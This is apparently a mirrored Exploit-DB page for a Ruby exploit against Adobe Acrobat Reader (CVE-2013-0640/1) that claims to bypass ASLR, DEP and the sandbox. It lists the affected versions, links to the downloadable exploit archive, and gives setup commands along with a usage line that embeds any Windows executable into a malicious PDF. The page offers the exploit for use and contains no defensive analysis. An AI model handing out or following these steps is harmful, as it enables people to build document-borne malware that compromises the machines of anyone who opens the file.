Adobe Acrobat Reader – ASLR + DEP Bypass with Sandbox Bypass

• Exploit Database
• 39 阅读

• 作者： w3bd3vil & abh1sek
  日期： 2013-11-28
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/29881/

• CVE-2013-0640/1
  Somehow, our script got on to the Russian forums :/
  
  @w3bd3vil and @abh1sek
  
  Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29881.tar.gz
  
  Adobe Acrobat Reader ASLR/DEP bypass Exploit with SANDBOX BYPASS
  =================================================================
  
  Supported Adobe Reader Versions:
  
  * 11.0.1
  * 11.0.0
  
  * 10.1.5
  * 10.1.4
  * 10.1.3
  * 10.1.2
  * 10.1
  
  * 9.5
  
  Tested on:
  
  * Windows 7 (32 bit)
  * Windows 7 (64 bit)
  * Windows XP
  
  Script Requirements:
  
  * Run on Windows :-)
  * Ruby 1.9.x (http://rubyforge.org/frs/download.php/76752/rubyinstaller-1.9.3-p385.exe)
  * Gems: origami, metasm (In command prompt type, gem install metasm && gem install origami -v "=1.2.5")
  
  FYI:
  a. It's a rip, of the original exploit.
  b. Works most of the times.
  c. We never really got into completing our script options though.
  
  ruby xfa_MAGIC.rb -h
  Usage: xfa_MAGIC.rb [options]
  -i, --input [FILE] Input PDF. If provided, exploit will be injected into it (optional)
  -p, --payload [FILE] PE executable to embed in the payload
  --low-memUse Heap spray suitable for low memory environment
  -o, --output [FILE]File path to write output PDF
  -h, --help Show help
  (Some commands are not supported at the moment)
  
  ruby xfa_MAGIC.rb -p example.exe -o poc.pdf